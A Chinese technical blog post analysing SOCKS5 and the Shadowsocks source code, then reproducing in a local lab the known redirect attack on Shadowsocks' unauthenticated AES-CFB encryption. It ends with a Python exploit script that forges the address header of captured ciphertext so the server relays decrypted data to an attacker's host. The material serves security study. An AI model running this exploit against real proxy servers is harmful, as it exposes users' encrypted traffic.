前言
本文主要分析了Shadowsocks
的源码和密码学漏洞原理
socks5
一种网络协议, 由于支持tcp
和udp
所以经常用于客户端
和外部网络服务器
之间的中间传输
socks5协议分析
本地写了个转发,监听在8081
端口
通过代理访问pwnsky.com
的流量包如下
通过psh
包的跟踪tcp流量获取到如下流量包
内容如下, 有缩进的为服务端
返回的数据
00000000 05 02 00 01 ....
00000000 05 00 ..
00000004 05 01 00 01 76 c1 45 9e 00 50 ....v.E. .P
00000002 05 00 00 01 00 00 00 00 00 00 ........ ..
0000000E 47 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a GET / HT TP/1.1..
0000001E 48 6f 73 74 3a 20 70 77 6e 73 6b 79 2e 63 6f 6d Host: pw nsky.com
0000002E 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 63 75 ..User-A gent: cu
0000003E 72 6c 2f 37 2e 37 38 2e 30 0d 0a 41 63 63 65 70 rl/7.78. 0..Accep
0000004E 74 3a 20 2a 2f 2a 0d 0a 0d 0a t: */*.. ..
逐行分析
客户端第一次请求与服务端第一次回复
客户端
VER | NMETHODS | METHODS |
---|---|---|
0x05 | 1 | 1 TO 255 |
服务端
VER | METHOD |
---|---|
0x05 | 1 |
VER 的值当被设置为 0x05,标明当前版本为Socks5
NMETHODS中包含在 METHODS 中出现的方法标识的数据,每种有各自对应的格式
- 0x00 无需认证
- 0x02 需要认证, 用户名/密码
- 0xFF 无可接受方法
00000000 05 02 00 01 ....
00000000 05 00 ..
客户端第二次回复
VER | REP | PSV | ATYP | BND.ADDR | BND.PORT |
---|---|---|---|---|---|
0x05 | 1 | 0x00 | 1 | Variable | 2 |
- VER: 0x05, 表明版本
- REP: 只有0x00标识连接成功,其他的见手册
- RSV: 保留字段,为0x00
- AYTP: 目标地址, 0x01 <--> ipv4, 0x03 <--> 域名, 0x04 <--> ipv6
- BND.ADDR: 服务器绑定地址
- BND.PORT: 服务器绑定端口
00000004 05 01 00 01 76 c1 45 9e 00 50 ....v.E. .P
完整流程
通过以上分析, 可总结, 完整连接流程为
- tcp握手
- 客户端请求连接
- 如果收到 0x05 0x00 则可以建立连接
- 发送 0x05 0x01 0x00 地址类型 + 目的地址 + 目的端口
- 接受服务器返回的自身地址和端口
这只是一次简单的socks5协议抓包分析, 更详细的内容可以参考文档
源码分析
工作方式
user request <--> sslocal <--> ssserver <--> destination
可以理解为原本访问的流量是A <--> B
AB
之间的流量可能被遮蔽或干扰
而A <--> C <--encrypted--> D <--> B
AB
没有直接通信, 中间所传输的数据都是加密后的, 所以被屏蔽或干扰的概率下降了很多
(主动嗅探等手段这里暂且不提)
模块介绍
一些重要的模块
- tcprelay.py:TCP 代理的实现
- udprelay.py: UDP 代理的实现
- asyncdns.py:异步 DNS 查询
- crypto:加密用到的依赖等
- cryptor.py: 加密的接口
- daemon.py:守护进程
- shell.py:读取命令行参数,检查配置
- local.py: 客户端
- server.py: 服务器
local.py && server.py
程序入口
两者大致内容相似, 可归纳为
...
# 获取配置
config = shell.get_config(True)
# 是否用守护进程的方式运行
daemon.daemon_exec(config)
...
# 注册dns解析器、tcp转发器、udp转发器
dns_resolver = asyncdns.DNSResolver()
tcp_server = tcprelay.TCPRelay(config, dns_resolver, True)
udp_server = udprelay.UDPRelay(config, dns_resolver, True)
# 放入循环中
loop = eventloop.EventLoop()
dns_resolver.add_to_loop(loop)
tcp_server.add_to_loop(loop)
udp_server.add_to_loop(loop)
loop.run()
...
发包
这里首先需要确定是tcp
还是udp
流量, 然后交由tcprelay.py
或udprelay.py
处理
中间实现代码很复杂, 尤其是TCPRelay
, TCPRelayHandler
且和本文关系不大
我们主要看数据收发、加解密部分
头
def parse_header(data):
addrtype = ord(data[0])
dest_addr = None
dest_port = None
header_length = 0
if addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV4:
if len(data) >= 7:
dest_addr = socket.inet_ntoa(data[1:5])
dest_port = struct.unpack('>H', data[5:7])[0]
header_length = 7
else:
logging.warn('header is too short')
elif addrtype & ADDRTYPE_MASK == ADDRTYPE_HOST:
if len(data) > 2:
addrlen = ord(data[1])
if len(data) >= 4 + addrlen:
dest_addr = data[2:2 + addrlen]
dest_port = struct.unpack('>H', data[2 + addrlen:4 +
addrlen])[0]
header_length = 4 + addrlen
else:
logging.warn('header is too short')
else:
logging.warn('header is too short')
elif addrtype & ADDRTYPE_MASK == ADDRTYPE_IPV6:
if len(data) >= 19:
dest_addr = socket.inet_ntop(socket.AF_INET6, data[1:17])
dest_port = struct.unpack('>H', data[17:19])[0]
header_length = 19
else:
logging.warn('header is too short')
else:
logging.warn('unsupported addrtype %d, maybe wrong password or '
'encryption method' % addrtype)
if dest_addr is None:
return None
return addrtype, to_bytes(dest_addr), dest_port, header_length
以上功能主要是:
判断数据为ipv4
, 域名
或ipv6
中的哪一种 并解析数据ip
, port
返回地址类型addrtype
,IPdest_addr
,port dest_port
,长度header_length
选择服务器
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
if type(server) == list:
server = random.choice(server)
logging.debug('chosen server: %s:%d', server, server_port)
return server, server_port
然后是从config
里面随机选择一个服务端,这里tcp
,udp
都一样
加密
udp
...
key, iv, m = cryptor.gen_key_iv(self._password, self._method)
...
try:
data = cryptor.encrypt_all_m(key, iv, m, self._method, data,
self._crypto_path)
...
首先生成key,iv, 跟踪进去查看生成方式
def gen_key_iv(password, method):
method = method.lower()
(key_len, iv_len, m) = method_supported[method]
if key_len > 0:
key, _ = EVP_BytesToKey(password, key_len, iv_len)
else:
key = password
iv = random_string(iv_len)
return key, iv, m
可以看到最后使用EVP_BytesToKey
的方式生成key
tcp
data = self._cryptor.encrypt(data)
def encrypt(self, buf):
if len(buf) == 0:
return buf
if self.iv_sent:
return self.cipher.encrypt(buf)
else:
self.iv_sent = True
return self.cipher_iv + self.cipher.encrypt(buf)
使用cipher.encrypt
来加密
跟进去查看cipher
的初始化
self.cipher = self.get_cipher(
password, method, CIPHER_ENC_ENCRYPTION,
random_string(self._method_info[METHOD_INFO_IV_LEN])
)
调用get_cipher
来初始化
def get_cipher(self, password, method, op, iv):
password = common.to_bytes(password)
m = self._method_info
if m[METHOD_INFO_KEY_LEN] > 0:
key, _ = EVP_BytesToKey(password,
m[METHOD_INFO_KEY_LEN],
m[METHOD_INFO_IV_LEN])
else:
# key_length == 0 indicates we should use the key directly
key, iv = password, b''
self.key = key
iv = iv[:m[METHOD_INFO_IV_LEN]]
if op == CIPHER_ENC_ENCRYPTION:
# this iv is for cipher not decipher
self.cipher_iv = iv
return m[METHOD_INFO_CRYPTO](method, key, iv, op, self.crypto_path)
可以看到最终也是使用EVP_BytesToKey
来生成key
所以无论tcp
还是udp
的加密本质上是一样的, 只是中间调用的方式不同
进入EVP_BytesToKey
查看
def EVP_BytesToKey(password, key_len, iv_len):
# equivalent to OpenSSL's EVP_BytesToKey() with count 1
# so that we make the same key and iv as nodejs version
cached_key = '%s-%d-%d' % (password, key_len, iv_len)
r = cached_keys.get(cached_key, None)
if r:
return r
m = []
i = 0
while len(b''.join(m)) < (key_len + iv_len):
md5 = hashlib.md5()
data = password
if i > 0:
data = m[i - 1] + password
md5.update(data)
m.append(md5.digest())
i += 1
ms = b''.join(m)
key = ms[:key_len]
iv = ms[key_len:key_len + iv_len]
cached_keys[cached_key] = (key, iv)
return key, iv
其实就是用passwd
作为种子, 根据key
的长度来不断哈希来生成真正的key
加密完成后发送给服务端
收包
和发包相似, 流程大致如下
解密 --> 解析(ip, port等) --> dns查询 --> 创建socket --> ip过滤 --> 修改数据格式 --> 转发
由于tcp
和udp
都是一样的, 这里用udp
来简化研究, 在117行
, 找到其中主要关注解密部分
data, key, iv = cryptor.decrypt_all(self._password,
self._method,
data, self._crypto_path)
def decrypt_all(password, method, data, crypto_path=None):
result = []
method = method.lower()
(key, iv, m) = gen_key_iv(password, method)
iv = data[:len(iv)]
data = data[len(iv):]
cipher = m(method, key, iv, CIPHER_ENC_DECRYPTION, crypto_path)
result.append(cipher.decrypt_once(data))
return b''.join(result), key, iv
首先根据password
, 用gen_key_iv
生成key
, 和客户端一致
然后decrypt_all
将iv
和data
分离出来(根据len(iv)
), 然后把data拿去解密
总结
纵观整个流程, 其实通讯设计是比较简单的, 没用常见的校验
、签名
等操作
数据结构:rand_iv + AES-cfb(key, rand_iv, data)
甚至连iv
都是直接在数据开头, 全靠用password
生成的key
来保证安全
aes-cfb
基本原理
可参考wiki
原理图如下:
- 与
aes-cbc
几乎相反 -- 首先进行aes加密, 然后与前一组异或 -
cfb
模式加密解密过程一样, 因为最后一步是异或
实验
#!/usr/bin/python
from Crypto.Cipher import AES
import os
key = os.urandom(16)
iv = os.urandom(16)
pt = b'0'*16
# 加密
cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
tmp = cipher.encrypt(pt)
print(tmp)
# 解密
cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
tmp = cipher.decrypt(pt)
print(tmp)
# b'B\x99\xcf\xde\x97F\x901\xd1\xf2\x02\xba\xaaT\xafI'
# b'B\x99\xcf\xde\x97F\x901\xd1\xf2\x02\xba\xaaT\xafI'
伪造
由于最后一步是异或, 那么我们在已知明文、密文且拥有解密权限下的情况下就可以控制明文了
推导如下:
对于第一组密文, 首先对iv
aes加密, 用作后面异或, 由于其值不变
可视为常量, 记作K
, 密文记作ct
, 明文记作pt
, 需要伪造的明文为pt'
, 伪造的密文为ct'
根据已知
ct = pt xor K
那么在已知pt
、ct
的情况下, 可以求得K
K = ct xor pt
在已知K
的情况下,
ct' = pt' xor K
即可伪造
#!/usr/bin/python
from Crypto.Cipher import AES
import os
key = os.urandom(16)
iv = os.urandom(16)
def xor(a,b):
return bytes(x^y for x,y in zip(a,b))
pt = b'0'*16
pt_ = b'1'*16
cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
ct = cipher.encrypt(pt)
K = xor(ct, pt)
print("pt: ", pt)
print("pt_: ",pt_)
print("K : ", K)
print("ct: ", ct)
print("xor(K,pt): ", xor(K,pt))
print("xor(K,ct): ", xor(K,ct))
ct_ = xor(K,pt_)
cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128)
pt_ = cipher.decrypt(ct_)
print("pt_: ",pt_)
'''
pt: b'0000000000000000'
pt_: b'1111111111111111'
K : b'\x9d\x04(\x07.u\xd8}\xff\xd9S\xb9*\x9e\x181'
ct: b'\xad4\x187\x1eE\xe8M\xcf\xe9c\x89\x1a\xae(\x01'
xor(K,pt): b'\xad4\x187\x1eE\xe8M\xcf\xe9c\x89\x1a\xae(\x01'
xor(K,ct): b'0000000000000000'
pt_: b'1111111111111111'
'''
利用
利用条件有两个关键点
- aes-cfb
- 已知明文、密文
由于在ss
默认的加密方式就是aes-cfb
,已知密文是自然, 已知明文可以通过ss
的http
包来推测
因为所有的http
包开头的数据都差不多, 前八个字节为HTTP/1.1
此攻击方法最早由奇虎360一位安全研究员提出
复现
config文件
编辑config文件在shadowsocks
根目录下, 这里我选择local为20001端口, server为20002端口
{
"server":"127.0.0.1",
"local_port":20001,
"server_port":20002,
"password":"happi0",
"timeout":60,
"method":"aes-256-cfb",
"local_address":"127.0.0.1",
"fast_open":false
}
在/srv/http
编辑index.php
文件,内容如下
<?php
echo "flag{cb9cd520a37a9c826841a8bcf3c20351}"
?>
本地、代理、服务端搭建
python server.py
python local.py
php -S 0.0.0.0:8008
测试代理是否正常
netstat -antup|grep LIS|grep "2000[12]"
tcp 0 0 127.0.0.1:20001 0.0.0.0:* LISTEN 90020/python
tcp 0 0 127.0.0.1:20002 0.0.0.0:* LISTEN 90021/python
测试http服务是否正常
用浏览器访问localhost:8080
即可
访问测试
curl --socks5 127.0.0.1:20001 10.19.4.171:8080
2021-09-13 03:46:43 INFO connecting 10.19.4.171:8080 from 127.0.0.1:35202
2021-09-13 03:46:43 INFO connecting 10.19.4.171:8080 from 127.0.0.1:33480
flag{cb9cd520a37a9c826841a8bcf3c20351}
由于127.0.0.1在代理的黑名单里,换成局域网地址即可
抓包分析
用wireshark
监听即可
tcp.port == 20001 || tcp.port == 20002
前两次psh
包握手过程, 不赘述
查看第三次握手包的data
部分
0a1304ab 1f90
即10.19.4.171 8080
即接下来数据的目的地址
这里把curl
的请求转发到local
上
然后local
将请求加密转发到server
上
并且长度较为加密前增加了171-148 == 23 == 16的iv + 7的ipv4转发
最后server
收到返回的数据后, 首先加密返回给local
local
解密后返回最初的请求
且长度也是相差16的iv
利用
首先把密文给截取下来, 用上文描述的方法, 转发给server
即可
这里参考
#!/usr/bin/python
import socket
import binascii
from Crypto.Util.number import long_to_bytes as lb
c = binascii.unhexlify("212aba32327c579d239a405770677e2ab1ca6f8288b9e59253917216b2034638c622293608b3a1dd843c71cf1fa704b95ee662c65fb14e1fca078643c6efb4f280a447d0493385dbbdf837f98e8b211749e1a738632b18fa2f1bb6a6ab83bb4c96035c611b79e1f36c2155493ddb8e4dc04c84297966959c4a4202c0bf51b1d0dbec1323b10bee1a4e3e3c58e3b8ee7796fdcaad638230fcf09f172e26271e2f0317481bde2cb1580f117a580908fb2ccac2d51a45a2976b56d41f6cca2227b17d76ddeb13390b8ddd3a7d92edada68a542b732c181ce43211e265")
def xor(a, b):
return bytes(x^y for x,y in zip(a,b))
plain = b"HTTP/1."
target = b"\x01" + lb(10) + lb(19) + lb(4) + lb(171) + lb(7777)
z = xor(plain, target)
new_c = c[:16] + xor(z, c[16:16+7]) + b"\x00"*(16-7) + c
s = socket.socket()
s.connect(("127.0.0.1", 20002))
s.send(new_c)
效果如下
参考资料
- https://wonderkun.cc/2020/02/18/shadowsocks%E7%9A%84%E9%80%9A%E4%BF%A1%E5%8E%9F%E7%90%86%E4%BB%A5%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95%E5%88%86%E6%9E%90/
- https://blog.soreatu.com/posts/analyasis-of-shadowsocks-and-related-attack/#wireshark-packets
- https://www.leadroyal.cn/p/1036/
- https://github.com/edwardz246003/shadowsocks
- https://github.com/LeadroyaL/ss-redirect-vuln-exp